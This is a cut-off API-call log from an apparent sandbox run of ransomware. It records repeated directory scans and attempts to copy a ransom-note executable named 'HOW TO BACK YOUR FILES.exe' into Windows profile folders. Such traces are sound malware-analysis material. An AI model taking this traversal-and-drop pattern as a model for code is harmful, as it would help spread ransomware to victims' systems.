[0065.764] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.764] CloseHandle (hObject=0x120) returned 1 [0065.765] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.765] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.765] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.765] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.765] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.765] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.765] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.765] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.766] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.766] GetLastError () returned 0x0 [0065.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.766] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.774] CloseHandle (hObject=0x120) returned 1 [0065.775] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.775] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.775] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.775] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.777] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.777] GetLastError () returned 0x0 [0065.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.777] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.781] CloseHandle (hObject=0x120) returned 1 [0065.781] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.781] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.786] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.786] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.786] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.786] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.787] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.787] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.787] GetLastError () returned 0x0 [0065.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.787] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.787] CloseHandle (hObject=0x120) returned 1 [0065.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.788] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.788] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.788] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.788] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.788] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.788] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.788] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.789] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.794] GetLastError () returned 0x0 [0065.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.795] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.795] CloseHandle (hObject=0x120) returned 1 [0065.795] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.795] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.795] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.795] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.795] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.795] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.796] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.798] GetLastError () returned 0x0 [0065.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.798] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.798] CloseHandle (hObject=0x120) returned 1 [0065.798] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.798] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.799] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.799] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.799] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.799] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.799] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.799] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.800] GetLastError () returned 0x0 [0065.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.800] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.800] CloseHandle (hObject=0x120) returned 1 [0065.800] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.800] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.800] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.800] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.800] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.800] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.800] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.800] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.801] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.801] GetLastError () returned 0x0 [0065.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.801] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.801] CloseHandle (hObject=0x120) returned 1 [0065.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.801] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.801] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.802] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.802] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.802] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.802] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.802] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.802] GetLastError () returned 0x0 [0065.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.802] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.803] CloseHandle (hObject=0x120) returned 1 [0065.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.803] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.803] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.803] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.803] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.803] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.803] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: 